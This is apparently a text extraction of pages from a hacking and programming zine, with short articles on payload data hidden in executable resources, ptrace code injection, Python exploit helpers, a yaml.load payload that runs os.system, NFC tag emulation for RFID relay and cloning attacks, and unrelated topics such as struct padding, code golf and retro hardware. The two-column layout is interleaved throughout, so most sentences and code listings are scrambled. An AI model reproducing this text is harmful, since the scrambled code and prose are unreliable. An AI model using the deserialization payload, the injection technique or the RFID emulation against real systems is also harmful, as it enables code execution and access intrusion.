etc. Of course, you could encrypt, prompt. I used D (www.dlang.org) for the compress or obfuscate the data prior to executable, but C/C++ would be very similar. inclusion in your application. Note that 64-bit code must be used here so link.exe will work with our D .obj file. Unknown apps with large read-only data sections or .data sections that appear to Creating a resource, resource definition and contain executable code should be suspected compiling into a .res file: for holding some sort of payload using this > echo PAGEDOUT! > myres.txt technique! > echo FOO RCDATA "myres.txt" > myres.rc > rc.exe myres.rc Jonathan Andrew github.com/docandrew www.linkedin.com/in/jon-andrew SAA-TIP 0.0.5 26 How do I start with reverse engineering? Starting off with reverse engineering is challenging, to say the least. There are numerous blogs freely available online which show certain techniques, but nearly all of them use proprietary tools. For this reason, I decided to create my own Binary Analysis Course1 where the focus is on the how and why, in combination with free tooling. Starting from June 2018, I published an array of articles, starting off at the very beginning and ending at known malware families such as Emotet or Magecart. The course is, and will, remain free for anyone to use in the future. If you have feedback or questions about the course or about reverse engineering in general, feel free to reach out to me on @LibraAnalysis2 on Twitter! 1 https://maxkersten.nl/binary-analysis-course/ 2 https://twitter.com/LibraAnalysis Programming Introduction to ptrace - injecting code into a running process flow of execution by modifying the RIP (EIP in x86, Introduction to ptrace RIP on x86-64 as used in this example) register. But before doing anything, let’s think about where - injecting code into a we would place our code in memory. One way to do it would be to parse /proc/PID/maps file and running process look for sections containing permissions to execute. Injecting code into a running program can have ~> cat /proc/12862/maps many use cases, from widely defined malware, 556e40ee8000-556e40ee9000 r--p 00000000 runtime patches of the process that cannot be 08:01 918642 /home/w3ndige/sample_process stopped, up to the topic of debuggers and reverse 556e40ee9000-556e40eea000 r-xp 00001000 08:01 918642 /home/w3ndige/sample_process engineering frameworks. They all need access to the state of the execution of another process, with In this example, second section from the truncated ability to read/write values from memory or maps output would be a way to go, we have registers. matching permissions (“r-xp ”) and an address range where we would be able to write our code On Linux such ability to debug another process is (556e40ee9000-556e40eea000 ). Even though provided by a system call named ptrace. It allows writing a parser for maps file is really easy, you can any program (called “tracer”) to observe and also use different techniques - overwriting code modify state of another process attached to it from address stored in RIP is another trivial (“tracee”) via number of requests. technique. On the other hand, we can try to find a #include https://www.rootnetsec.com Karol Trociński 28 SAA-TIP 0.0.5 Strings & bytes in Python 3 Programming Strings & bytes in Python 3 Let’s remind ourselves about character encodings. The You are building an exploit and, not being a barbarian, goal is to represent a character such as ”A”. Comput- have switched from Python 2 to 3. One part of your ex- ers work with numbers (more precisely bits), not char- ploit involves leaking an important address by dumping acters, so we translate the character into a number. In a chunk of memory. This chunk of memory contains a the ASCII encoding, this is the number 65. We call this lot of random data but somewhere in the middle you the codepoint. This value is then encoded using a single 1 know that there is a string ”H¨ar: ” followed by the byte 0x41. This is simple in ASCII because there is a 4 bytes representing the little endian encoding on the one to one to one mapping between characters, code- address you are looking for. You copy some old Python points and bytes and can this be implicitly done with- 2 code that you have used for a similar situation: out thinking about it. Python strings are not limited def extract_leaked_pointer(leak): to ASCII but can represent the full Unicode range. If marker = 'H¨ar:' we use the UTF-8 encoding and take the character ¨a start = leak.find(marker) we instead get: leak_start = start + len(marker) leak_data = leak[leak_start:leak_start+4] Character Codepoint Bytes Encoding return struct.unpack(' Zeta Two https://zeta-two.com https://twitter.com/ZetaTwo SAA-ALL 0.0.5 https://youtube.com/ZetaTwo 29 Programming CP850 cmd game in C# .NET _COORD coord = new _COORD(); CP850 cmd game in C# .NET SetConsoleDisplayMode( Meemki, a somewhat bored security researcher who GetStdHandle(-11), 1, out xy); accidentally exploits and therefore shuts down a part of the stable universe computer, is the protagonist in an …and you are done! Fullscreen borderless cmd. urban noir-style EASCII game. He learned a lot about the Based on the keywords DllImport and the imported infrastructure he discovered by using an unknown function’s names, you are able to dig into the topic(s) proprietary protocol. Now he knows the universe will de- deeper or just use the code to set up a fullscreen cmd to stabilize reaching an undefined state in a couple of days. get an immersive experience. He needs to get physical access to the universe computing Another tricky part is the keyboard input: Open a notepad infrastructure which is held by the SAOTU (Secret Alliance in Windows and press a letter on your keyboard for some of the Universe). On his way he needs to exploit all kinds time. You will notice a delay before the letter is of security systems, physical as well as computer based repeatedly printed and probably a delay after releasing and gets himself in situations he was not prepared the key. This behavior is called character repeat hold time for…………………………………………………………………………………….. and delay. It is a system setting and also occurs when O_ O_ using the standard Console.ReadKey in C#. The delay is O O O /_ / O very impractical for games, so we need another way to / / /_ \ \ /\ handle keyboard input. Luckily there is a way using _/\ _\ / / ` \ \ WinAPI’s winuser.h through user32.dll. The GetKeyState ` / `/ / ` ` / function allows us to check if a given key is down and can ` ` ` ` be used in C# as follows: When starting with this Meemki project, a few constraints were made for the sake of fun, style and challenge: run in [DllImport("user32.dll")] cmd; system libs only; graphics with CP850 chars. I used public static extern short GetKeyState( C# .NET because it is fast to get to the point and I am int nVirtKey); quite confident with it. In this article, some tricks are shown which solve common The returned short’s high order bit will be 1 if the nVirtKey problems with game development for cmd to get you is down. All that is left to do is getting the hex code for the started. key we want to check (http://msdn.microsoft.com/en- First of all, we want a borderless fullscreen cmd. This can us/library/dd375731%28v=VS.85%29.aspx), pass it to the be achieved by utilizing WinAPI’s ConsoleApi3.h available function and compare with a proper bitmask: through the kernel32.dll. In particular we are going to use the SetConsoleDisplayMode function which can be if ((GetKeyState(0x27) & 0x8000) != 0) accessed in C# as follows: 0x27 is the right-arrow on the keyboard and the if- [DllImport("kernel32.dll")] statement is true when the key is down. This way public static extern bool keystrokes feel very direct. If this solution is still too slow SetConsoleDisplayMode(IntPtr hConsoleOutput, for you, have a look at the GetAsyncKeyState function uint dwFlags, within winuser.h which reflects the interrupt-level state of out _COORD lpNewScreenBufferDimensions); the keys. Last but not least, if you want to redraw the content of In order to invoke it, we need the _COORD struct and a the cmd, it is worth to consider double buffering to avoid handle to the console screen buffer: flickering/stuttering which is likely to appear when redrawing the whole screen for every frame. For Meemki [StructLayout(LayoutKind.Sequential)] public struct _COORD a memory buffer is used and only the changes between { two frames are redrawn to the screen by using public short X; Console.SetCursorPosition and Console.Write. public short Y; Meemki is currently in a very early stage but if you are public _COORD(short x, short y) interested, check it out here: github.com/0xRUFF/Meemki {X = x; Y = y;} }; [DllImport("kernel32.dll")] public static extern IntPtr GetStdHandle(int nStdHandle); Calling the functions on startup with -11 for the standard DISCLAIMER: The described methods may not work on all output handle and 1 for console fullscreen mode: devices as they might depend on certain drivers. github.com/0xRUFF Christian Bohnhoff 30 SAA-TIP 0.0.5 from cpython_exploit_ellipsis import * Programming from cpython_exploit_ellipsis import * Have you ever tried using Ellipsis in Python? No? Since those are real modules, we can also call their func- Then do this in your Python interpreter: tions. Let’s see this on an example that uses the unsafe yaml.load function that allows us to launch arbitrary code >>> ... via loading proper yaml payload: Ellipsis >>> ....yaml.load( ... "!!python/object/apply:os.system " Boom! If you don’t know what Ellipsis is for,this arti- 1 ... "['echo yaml.load is insecure by design :(']") cle won’t explain it . We will play with Ellipsis a bit more yaml.load is insecure by design :( instead. Let’s begin with some magic: 0 >>> from cpython_exploit_ellipsis import * The second feature the magic gave us is the ability to >>> ..., isinstance(..., Ellipsis.__class__) get libc functions via __getitem__. This might be handy (Ellipsis, True) if you want to play with things like printf, scanf or other not-so-obvious functions and you are too sophisticated to put yourself in a write-compile-launch loop. Example below. The Ellipsis seems to be the same but it has two addi- tional features. First of all, we don’t have to do any explicit >>> ...['system'] import statements now. We can do inline imports instead, <_FuncPtr object at 0x7f35603aa4f8> via Ellipsis object’s __getattr__: >>> ...['rand']() 51242132 >>> ....antigravity >>> ...['printf'](b'%p %p %p %p %p %p\n', id(...)) That’s all. So how is it done? See for yourself by solving the puzzle below and studying the exploit code! Enjoy o/ 33 0d 0d 0a 56 27 eb 5c b9 01 00 00 e3 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 40 00 00 00 73 76 00 00 00 64 00 64 01 6c 00 54 00 47 00 64 02 64 03 84 00 64 03 83 02 5a 01 78 34 65 02 65 03 64 04 6a 04 83 01 83 01 64 05 64 06 64 07 68 03 18 00 44 00 5d 18 5a 05 65 06 65 01 65 05 65 07 64 04 6a 04 65 05 83 02 83 03 01 00 71 30 57 00 65 08 65 01 83 01 65 09 65 08 64 04 83 01 65 0a 65 0b 83 01 17 00 65 0c 65 0d 83 01 83 02 6a 0e 5f 0f 64 08 5a 10 64 09 53 00 29 0a e9 00 00 00 00 29 01 da 01 2a 63 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 40 00 00 00 73 20 00 00 00 65 00 5a 01 64 00 5a 02 64 01 64 02 84 00 5a 03 65 04 5a 05 64 03 64 04 84 00 5a 06 64 05 53 00 29 06 da 04 5f 5f 5f 5f 63 01 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 43 00 00 00 73 04 00 00 00 64 01 53 00 29 02 4e da 08 45 6c 6c 69 70 73 69 73 a9 00 29 01 da 01 5f 72 05 00 00 00 72 05 00 00 00 fa 21 2f 74 65 73 74 2f 63 70 79 74 68 6f 6e 5f 65 78 70 6c 6f 69 74 5f 65 6c 6c 69 70 73 69 73 2e 70 79 da 08 5f 5f 72 65 70 72 5f 5f 04 00 00 00 73 02 00 00 00 00 01 7a 0d 5f 5f 5f 5f 2e 5f 5f 72 65 70 72 5f 5f 63 02 00 00 00 00 00 00 00 02 00 00 00 03 00 00 00 43 00 00 00 73 0e 00 00 00 74 00 74 01 64 01 83 01 7c 01 83 02 53 00 29 02 4e 7a 09 6c 69 62 63 2e 73 6f 2e 36 29 02 da 07 67 65 74 61 74 74 72 5a 04 43 44 4c 4c 29 02 da 02 5f 5f da 04 69 74 65 6d 72 05 00 00 00 72 05 00 00 00 72 07 00 00 00 da 0b 5f 5f 67 65 74 69 74 65 6d 5f 5f 07 00 00 00 73 02 00 00 00 00 01 7a 10 5f 5f 5f 5f 2e 5f 5f 67 65 74 69 74 65 6d 5f 5f 4e 29 07 da 08 5f 5f 6e 61 6d 65 5f 5f da 0a 5f 5f 6d 6f 64 75 6c 65 5f 5f da 0c 5f 5f 71 75 61 6c 6e 61 6d 65 5f 5f 72 08 00 00 00 da 0a 5f 5f 69 6d 70 6f 72 74 5f 5f da 10 5f 5f 67 65 74 61 74 74 72 69 62 75 74 65 5f 5f 72 0c 00 00 00 72 05 00 00 00 72 05 00 00 00 72 05 00 00 00 72 07 00 00 00 72 03 00 00 00 03 00 00 00 73 06 00 00 00 08 01 08 02 04 01 72 03 00 00 00 2e da 09 5f 5f 63 6c 61 73 73 5f 5f 72 08 00 00 00 72 11 00 00 00 5a 0c 64 69 73 63 6f 6e 6e 65 63 74 33 64 4e 29 11 5a 06 63 74 79 70 65 73 72 03 00 00 00 da 03 73 65 74 da 03 64 69 72 72 12 00 00 00 72 0a 00 00 00 da 07 73 65 74 61 74 74 72 72 09 00 00 00 da 02 69 64 da 04 63 61 73 74 5a 06 73 69 7a 65 6f 66 5a 09 63 5f 73 73 69 7a 65 5f 74 5a 07 50 4f 49 4e 54 45 52 5a 08 63 5f 75 69 6e 74 36 34 da 08 63 6f 6e 74 65 6e 74 73 da 05 76 61 6c 75 65 da 0a 5f 5f 61 75 74 68 6f 72 5f 5f 72 05 00 00 00 72 05 00 00 00 72 05 00 00 00 72 07 00 00 00 da 08 3c 6d 6f 64 75 6c 65 3e 01 00 00 00 73 0a 00 00 00 08 02 0e 08 1e 01 18 02 22 01 1 You might want to check out https://stackoverflow.com/questions/772124/what-does-the-python-ellipsis-object-do disconnect3d https://disconnect3d.pl/ https://github.com/disconnect3d SAA-ALL 0.0.5 https://twitter.com/disconnect3d_pl 31 Programming A parser-generator in 100 lines of C++ A PARSER–GENERATOR IN 10016 LINES OF C++ Please excuse the longish intro – I promise this is going somewhere! The usage should be also simple. For receiving: In the past, my day job consisted of creating and maintaining auto data = socket.read(); a Material Flow Control System (often called MFCSopt) for mov m = mov::parse(data); warehouses and production plants. This necessitated log << m.value • keys (field names) should be verified at compilation template dev.krzaq.cc KrzaQ https://twitter.com/KrzaQ2 32 SAA-ALL 0.0.5 Rome golfing Programming At the beginning of year 2003 on usenet newsgroup Rome golfing pl.comp.lang.javascript a small code golf challenge has been posted. Ultimately what they produced is mind boggling: How do you convert for example 42 to base 16? 42 / 16 | 2 r 10 A function rome(N,s,b,a,o){ 2 / 16 | 0 r 2 2 42 (10) = 2A (16) for(s=b='',a=5;N;b++,a^=7) for(o=N%a,N=N/a^0;o--;) Can we do the same to convert arabic numbers to s='IVXLCDM'.charAt(o>2?b+N-(N&=~1)+(o=1):b)+s; roman? return s In base 10 system we have units, tens, hundreds and } so on... Each as ten times previous one. But that is not the case with roman numerals: Function rome takes one argument N which is the Symbol I V X L C D M number to convert. Other arguments are basically just Value 1 5 10 50 100 500 1000 local variable declarations without using var keyword. Global variables wouldn’t be elegant. V is five times I, but X is two times V. Then L is five Resulting roman numeral is assembled in s. times X and C two times L. There is pattern alternating Variable b is a pointer to the currently processed 5 and 2. Let’s try to convert 42: symbol. It is initialized to an empty string which treated as a number would be converted to value 0. 42 / 5 | 8 r 2 II Variable a is used to alternate between 2 and 5. 8 / 2 | 4 r 0 Remainder – number of symbols of given type – is 4 / 5 | 0 r 4 XXXX / XL saved in variable o. First divide 42 by 5 which gives 8 and remainder 2. So there are two symbols I. Outer loop initializes variables and goes as long as N Next divide 8 by 2 (remember to alternate) to get 4 is not zero. After each iteration it moves to the next and remainder 0, so no Vs there. symbol (b++) and switches between 2 and 5 using neat Lastly dividing 4 by 5 gives terminating 0 and xor bit twiddling trick. remainder 4. That gives four symbols X. 42 is XXXXII using additive notation, but for four Initialization part of inner loop divides N by a (2 or symbols in a row we’re using subtractive notation. Thus 5) and sets o to remainder and N to quotient. Because we need to reach for next symbol and precede it with one JavaScript has only floats N/a^0 trick acts like int(N/a) current symbol giving in result XLII. discarding fractional part. If we look at various numbers there are two variants Loop goes as long as o is greater than zero. requiring subtractive notation. One is like 4 subtracting Call to charAt method on a string chooses next from next symbol (IV) and other like 9 subtracting from symbol which is concatenated with s. symbol two places further (IX). Let’s look at 19: If o is not greater than 2 index is simply current symbol being processed, i.e. value of b. 19 / 5 | 3 r 4 IX Otherwise subtractive case is handled. 3 / 2 | 1 r 1 V Index is the current position (b) plus one (o=1) plus 1 / 5 | 0 r 1 X another one if N is an odd number. 19 divided by 5 is 3 and remainder 4. Four symbols we Middle part of that – N-(N&=~1) – uses bit trick to want to write in subtractive notation and this is second set least significant bit of N to 0 effectively subtracting variant so we reach to X and subtract I from it. one from odd numbers. Even values stay unchanged so whole expression is 0 for odd numbers and 1 otherwise. Then 3 divided by 2 gives 1 with remainder 1. That gives one symbol V. Final step is to divide 1 by 2 to get 0 and remainder return s – I have absolutely no idea what comment 1. Last symbol is X. it warrants ;) XVIX is not the expected result. Problem is that IX in additive notation is VIIII so we should have had one Happy golfing less Vs in the result. Let’s try again. Taeril 19 / 5 | 3 r 4 IX 19 / 5 | 3-1 r 4 IX Usenet discussion is archived at: https://groups.google.com/d/ 3 / 2 | 1 r 1-1 2 / 2 | 1 r 0 topic/pl.comp.lang.javascript/uDJED8XeaDg 1/5|0r1 X 1/5|0 r1X Unfortunately it’s in Polish language. Great respect to Vax who was the main driving force of this challenge, but also to BlaTek, Coder and Krzyszt off for participating. And that gave XIX :) Alternatively we can subtract Awesome, mind blowing job! one from the division result before the next step. Taeril https://taeril.kraina.org/ CC BY 4.0 33 Programming Does order of variable declarations matter? For comparison, let’s change the order of variables Does order of variable in our structure: declarations matter? struct A { char a; Let’s check this in an example in C++ int c; char b; struct A { }; char a; Again, let’s check the offsets: char b; int c; (gdb) ptype /o struct A }; /* offset | size */ type = struct A { /* 0 | 1 */ char a; int main() { /* XXX 3-byte hole */ cout << sizeof(struct A); /* 4 | 4 */ int c; } /* 8 | 1 */ char b; /* total size (bytes): 12 */ } In our structure we have two chars (2 x 1 byte), and 1 one int (1 x 4 bytes ). While the total size of Currently, the size of the structure is 12 bytes. In structure fields is 6 bytes, unexpectedly the this case, a 3-byte gap was created between “a” program printed out that the structure size is “8“. and “c”. The structure itself also has a 3-byte hole/ What happened? Let's look deeper and check the padding at its end. This is useful if we have an array offsets of variables. One possibility is to use GDB of structure objects so all of them start on aligned (version 8.1 or newer). Before that, we need to use addresses. our structure somewhere, for example by adding If you need a particular structure layout, for this simple code to the main function: example to fit a given protocol, you can use Structure-Packing Pragmas5 to change alignment. A obj; For instance, the following code sets the alignment 6 Now, we can debug our program with to one byte : 2 gdb --quiet [path to executable file] and then #pragma pack(1) use GDB’s ptype command to show the layout of the structure, generated by the compiler: If we place this code before declaring the second structure, it will be packed into the following form: (gdb) ptype /o struct A /* offset | size */ type = struct A { (gdb) ptype /o struct A /* 0 | 1 */ char a; /* offset | size */ type = struct A { /* 1 | 1 */ char b; /* 0 | 1 */ char a; /* XXX 2-byte hole */ /* 1 | 4 */ int c; /* 4 | 4 */ int c; /* 5 | 1 */ char b; /* total size (bytes): 8 */ } /* total size (bytes): 6 */ } As you can see, there is a 2-bytes gap after the char Now, without alignment the size is exactly what we “b”. It is a common practice of data alignment3 - it expected at the beginning. ;) can improve performance in some cases, especially when you use SIMD4. To sum up, yes, the order of variable declarations is relevant. 1 Please note that the size of int depends on the compiler and the type of architecture. In our case (x86-64) it’s 4 bytes. 4 SIMD (Single instruction, multiple data) is an instructions set 2 Make sure to add debug information when compiling, ing++ which allows you to execute the same operation on multiple or clang++ pass -g flag for that. data at the same time. 3 You can read more about the topic here: 5 See: https://gcc.gnu.org/onlinedocs/gcc-9.1.0/gcc/Structure- https://en.wikipedia.org/wiki/Data_structure_alignment Layout-Pragmas.html https://stackoverflow.com/questions/4306186/structure- padding-and-packing 6 The directive applies to all later struct declarations. You can return to previous settings using #pragma pack(). https://github.com/sergiuszlts Sergiusz 34 SAA-POOL 0.0.5 Bootcard Programming Bootcard .section .text tsurai tsurai github.com/tsurai CC BY-SA 4.0 35 Programming Designing adder circuit for Fibonacci representation Designing adder circuit for Fibonacci representation Tomasz Idziaszek algonotes.com/en/fibonacci-arithmetic Fibonacci numbers are defined as follows: In a single step, we need to apply one of these trans- formations to a group of four double-bits, which come F0 = 0, F1 = 1, Fi = Fi−1 + Fi−2 for i ≥ 2, from adding ai + bi. We represent such a double-bit as thus forming an infinite sequence 0, 1, 1, 2, 3, 5, 8, 13 ... a two-bit integer AiBi, thus first we apply a half adder Any natural number can be represented as a sum of h to them (see image below). distinct Fibonacci numbers, e.g. 7 = 5 + 2 = F5 + F3. The circuit fib-adder that selects appropriate transfor- Edouard Zeckendorf noticed that as long as we don’t use mation is a little bit complicated. Note that the leftmost adjacent numbers, this representation is unique. Thus a double-bit is always in {0, 1}, since we already removed binary string ak−1 ...a1a0 of length k in which there are 2s from that part, so we don’t need A3. no adjacent 1s, uniquely represents number B3 A2 B2 A1 B1 A0 B0 ak−1 · Fk+1 + ... + a1 · F3 + a0 · F2. There are Fk+2 such strings and they represent numbers from 0 to Fk+2 − 1. ai bi We could imagine a computer that stores integers in this representation (think that it would improve sturdi- fib-adder ness of punch cards, should such computer use them: no h adjacent 1s means no adjacent holes). That leads to a ′ ′ ′ ′ ′ ′ question: how to perform basic arithmetic operations? Ai Bi B3 B2 A1 B1 A0 B0 Let’s start with incrementation by one. To increment ak−1 ...a1a0 and obtain ckck−1 ...c1c0, where ck is the To construct a multidigit adder we must take care of carry (overflow) flag, it suffices to do the transformation border cases (at both sides of the string). On the left we a1a0 → c1c0 on the last two bits: just add bogus 0. On the right we introduce bogus F1 and F0. The latter has value 0, so obtained coefficient 00 → 01 01 → 10 10 → 11 can be ignored, but the former has to be examined. and leave the remaining bits unchanged. After all this we get a string containing only 0s and 1s, Unfortunately, this could lead to a pair of adjacent 1s. but there could be arbitrarily long strides of adjacent 1s, We can remove it by applying transformation 011 → 100 as well as bogus c−1 = 1. from right to left to subsequent triplets of bits. On the To fix it, we apply a sweep of transformation 011 → 100 image below there is a circuit fix that performs such twice. First from left to right, which is equivalent to transformation and a 5-bit incrementer using it: making following transformations for y in {0, 1}: s s s s a4 a3 a2 a1 a0 y012 0 → y(10) 00 y012 +10 → y(10) 010 a2 a1 a0 After that groups of adjacent 1s have length at most two. We can remove them by making another sweep from fix right to left. Also c0 and c−1 cannot be simultaneously 0 fix equal to 1, so we can just or them. On the image below fix fix there is an adder producing ck+1ck ...c1c0 for k = 5: fix b4 b3 b2 b1 b0 ′ ′ ′ a2 a1 a0 c5 c4 c3 c2 c1 c0 a4 a3 a2 a1 a0 0 h h h h h Addition of two integers ak−1 ...a1a0 and bk−1 ...b1b0 is more complicated. After we add them position-wise, fib-adder we could end up with adjacent 1s or even some 2s (but fib-adder 0 only surrounded by 0s from both sides). 0 fib-adder 0 First we try to remove 2s (ignoring adjacent 1s). We do it fib-adder 0 from left to right, making sure that we do not introduce fix fib-adder any new 2s to the left, but we can introduce some new 2s to the right (and even some 3s, as well as some 2s or fix 0 0 3s adjacent to 1s, that must be removed in subsequent fix steps). After playing for a while with transformations fix needed, we could obtain the following list: 0 fix fix 020x → 100¯x 021x → 110x fix 030x → 110¯x 012x → 101x fix Here x denotes any digit from {0, 1, 2} andx ¯ = x + 1. c6 c5 c4 c3 c2 c1 c0 algonotes.com Tomasz Idziaszek 36 SAA-ALL 0.0.5 A box of tools to spy on Java Programming A box of tools to spy on Java. OpenJDK has been improving its tools lately and provides us with some powerful spying tools - all of them come with man pages, if in doubt take a look there! Some might require the newest JDK - 11. jps - launched without any flags it will simply list all Java processes and their pids, but there are some useful flags you might want to include, such as -v (lists arguments passed to the JVM), -m (lists arguments passed to the main method) or -l (shows package names). jstack - prints all Java thread stack traces with useful information, such as what state the thread is in and what code it’s currently executing. Very useful for identifying deadlocks, livelocks and similar. The states a Java thread can be in include (among others) BLOCKED (thread is waiting for entry to a critical section), WAITING (thread blocked from code - Object.wait()), TIMED_WAITING (Object.wait() with a timeout argument). There is much more useful information, such as daemon_prio (priority inside JVM), os_prio (priority in the OS), tid (id of the thread), nid (id of the thread in the OS), address on heap. Especially nid might come in useful to use some more advanced OS tools to learn more about the thread. jmap - this tool will give you a look into the heap. It can do a heapdump on JDK below version 11, since JDK 11 you should do that with jcmd (note that dumping the heap causes a “stop the world” event so don’t do that on critical processes). Some useful flags include -clstats (display stats for each class), -histo (for histogram) and -finalizerinfo (to view classes which are gathered by Garbage Collector but their finalize() methods have not been called yet) jstat - samples a running JVM for selected metrics. Useful to quickly identify easy-to-spot issues but won’t help with more ephemeral ones. Some useful flags include -gcutil (for stats on GC) and -printcompilation (displays the last successful JIT compilation). jcmd - introduced in JDK 7, this tool is the swiss army knife of JVM diagnostic tools - it sends a command to a running JVM to accomplish most of what other tools allow for and more. Launched without any commands acts as jps. Use jcmd jhsdb (Java HotSpot debugger) is your go-to tool for post-mortem analysis, introduced in JDK 9. If you provide it with a core dump file and a path to the JVM that was used to launch the process it will let you launch most of the aforementioned tools on a dead process. Usage: jhsdb jstack|jmap|jinfo --core Radosław Skupnik https://rskupnik.github.io/ SAA-ALL 0.0.5 37 Radio TRF7970A forgotten features for HydraNFC But we should also be aware of other registers like the TRF7970A Modulator and SYS_CLK control (0x09) that set the forgotten features type of modulation and data speed (defined in table 6- 1), as well as the Chip Status Control register (0x00) to for HydraNFC set transceiver mode like the interesting Direct Mode 0 (Raw RF Sub-CarrierData Stream) to encode/decode all 13.56MHz subcarrier data stream, which is perfect when The TRF7970A is a powerful multi-protocol reading non-ISO standard compliant tags for example. transceiver IC (Integrated Circuit) included in the HydraNFC module, that most of its owners only use The following Python 2 code illustrates preliminary to sniff data exchanged by a 13.56MHz NFC/RFID steps to set the transceiver in emulation mode: tag and a reader with tools provided in HydraBUS # from bbio_hydranfc_init.py firmware. But specifications1 show much more abilities configure_trf797a_gpio() than people are actually aware of, as this transceiver enter_bbio() bbio_spi_conf() can be fully controlled in low level by an MCU (Mi- bbio_trf7970a_init() crocontroller Unit). Moreover, makers and developers ## END of HydraNFC/HydraBUS have documented features def sendspi(data, res_len=0x0): to read and to emulate some types of tags using the cs_on() # write ’n’ data, read data provided interface of HydraBUS, and by digging in ser.write(”\x05\x00”+chr(len(data))+chr(res_len)) their documentations, we can find some examples status=ser.read(1) # Read Status and commands to use default raw mode of this little cmd_check_status(status) IC2. This mode unleashes awesome possibilities to cs_off() sendspi(”\x83”) # power on reset weaponize 13.56 MHz RFID attacks for specific intru- # 13.56 MHz SYS_CLK, OOK (100%) Mod type sions, or to support various types of cards and readers. sendspi(”\x09\x31”) sendspi(”\x01\xa4”) # set emulator mode sendspi(”\x41”, 0x1) To use it, a series of steps have to be performed sendspi(”\x00\x21”) # turn RF active through HydraBUS serial interface: # 5V operation # [other control register here] • configure GPIOs for SPI (PA2, PA3, PC0, PC1, # [machine state to respond] and PB11); Sources of implemented emulators like hy- • enter in bitbang mode; dranfc_emul_mifare.c could inspire us to implement a tag compatible with targeted systems. Of courses, a • switch into SPI mode and configure SPI frequency, lot of work and tests would have to be performed when polarity and phase, and then the SPI2 speed that setting all control registers as well as the state machine should be close to specified DATA_CLOCK at 2 to talk to the reader. Moreover, in lots of cases when MHz as in TRF7970A datasheet; the reader is strict with the timing of responses, it is better to implement all the emulation in the MCU part. • turn on RF and then check if TRF7970A is alive. The TRF7970A, as integrated in the HydraNFC, is A Python script bbio_hydranfc_init.py3 automates already a powerful tool to sniff data, but all of its capa- that process in HydraFW repository. Moreover, a bilities are still underused while it could be a cheaper al- project called pynfcreader4 has been released to talk in ternative to the Proxmark3 for many cases. In addition low level to some NFC cards by using the HydraNFC. to emulation, cloning and tag reading (even the non-ISO These two contributions are very helpful to understand standard), the TRF7970A can also be used for relay how to control the transceiver through the SPI interface. attacks such as those unburied recently for payment sys- tems6, and other systems like passive keyless entry and Above all, we should at least be aware of the ISO start systems7, that do not have a strict timing restraint. Control Register (0x01, 8 bits long), as described in the transceiver datasheet (table 5-5)5, to work for To finish, it is recommended to read the datasheet example as an NFC reader → *0x01=0x88 (active of this awesome transceiver that is full of surprises and mode, no CRC), or emulator → *0x01=0xA4 (ac- could help to create interesting tools when testing or tive mode, card emulator mode and used protocol). attacking RFID/NFC systems. 1http://www.ti.com/product/TRF7970A 2https://github.com/hydrabus/hydrafw/wiki/HydraFW- HydraNFC-v1.x-TRF7970A-Tutorial 3https://github.com/hydrabus/hydrafw/blob/master/contrib/bbio_hydranfc/bbio_hydranfc_init.py 4https://github.com/gvinet/pynfcreader 5https://datasheet.octopart.com/TRF7970ARHBR-Texas- 6https://salmg.net/[...]/intro-to-nfc-payment-relay-attacks/ Instruments-datasheet-15828043.pdf 7http://s3.eurecom.fr/docs/ndss11_francillon.pdf https://twitter.com/FlUxIuS Sébastien Dudek (@FlUxIuS) 39 SAA-ALL 0.0.5 Build your own controller for NES! Retro Build your own controller for Pegasus (NES clone)! The article covers the communication The protocol described previously is akin to protocol between the controller and the SPI. We can use this fact to utilize the SPI console, and a PoC implementation of a simple HW block in slave mode. MISO can be used as controller built using ATmega8A. DATA. Similarly, SCK can be used as CLOCK. An Pegasus features two DB9 male ports on the SPI slave needs to have SS asserted for all front of the console to support swappable the time the transmission takes place. We can controllers. Simplified pinout of the port can use STROBE to generate the proper SS signal on be seen in the corresponding diagram. a GPIO pin. To be sure we do it fast enough, we connect STROBE to INT0 (PD2) and handle the proper ISR. As the aforementioned GPIO we’ll use PB1 by strapping it to SS (PB2). Crucial excerpts from the PoC implementation can be seen below. Implementation of GPIO macros is left as an exercise for the reader. #include ... static uint8_t shift_data = 0xff; Inputs and outputs are described in regards static void shift_init(void); to the console. Obviously, a female plug of int main(int argc, char *argv[]) the controller needs to be mirrored. { +5V and GND are power lines. The console shift_init(); acts as a master, shifting out bits on DATA, // input with a pull-up where „0” implies a button press. Each bit gpio_cfg_inp(BUTTON); gets acknowledged by a tick on CLOCK. Before sei(); the start of transmission, a signal on STROBE while (1) is sent to update the shift register with the { current state of buttons. A transmission // handle GPIO buttons example can be seen in the corresponding if (0 == gpio_get(BUTTON)) diagram. { shift_data = (uint8_t) ~_BV(BTN_A); Bits on DATA denote the following buttons, _delay_ms(200); consecutively: A, B, Select, Start, Up, Down, shift_data = 0xff; Left and Right. In the diagram the A button is } pressed, any other button is released. } Timing of the signals is not defined per se, return 0; but you can use the following as reference: } • positive STROBE impulse width - 4.5 us, ISR(INT0_vect) // on the rising edge of STROBE • time distance between positive edges of { consecutive STROBE impulses - 20 ms (50 Hz, gpio_set(FORCE_SS); compare with the frame rate of PAL), SPDR = shift_data; • negative CLOCK impulse width - 0.58 us, gpio_clr(FORCE_SS); • time distance between negative edges of } consecutive CLOCK impulses - 15.79 us, ISR(SPI_STC_vect) • response delay - 120 ns. { Response delay is the time after which DATA /* restore SS to high after transaction */ sets its state accordingly to STROBE or CLOCK gpio_set(FORCE_SS); changes. The state of DATA may change on a } positive edge of STROBE or CLOCK. static void shift_init(void) In order to implement the protocol above we { could buy a chip with a built-in shift gpio_cfg_inz(STROBE); // hi-Z input, PD2 register and interface it to an MCU, but it gpio_cfg_out(FORCE_SS); // output, PB1 would be no fun. Let's try to use our MCU to /* note that PB1 is strapped to SS (PB2) */ the fullest. MCUCR |= _BV(ISC01) | _BV(ISC00); The naive approach to the challenge would GICR |= _BV(INT0); utilize GPIO bit-banging. There is a major gpio_cfg_out(DATA); // MISO, PB4 issue with this idea as the required timing is SPCR |= _BV(SPE) | _BV(CPOL) | _BV(SPIE); strict. CPU stress would be high enough to } stop us from doing tasks such as USB handling. Szymon Morawski - CC BY 4.0 40 Retro Wobble the Nintendo logo on the Game Boy cp b jr nz,.inner_loop Wobble the ld a,b inc b Nintendo logo on add a,e and $1F ; We use the current scanline the Game Boy by Felipe Alfonso - bitnenfer ; position and the LUT offset ; to calculate the index into This is a very simple but fun effect that can be ; the LUT. achieved in just a couple of lines of assembly. This ; idx = (scanline + lut_ofs) & 0x1F effect is done using the same Nintendo logo that is ld l,a 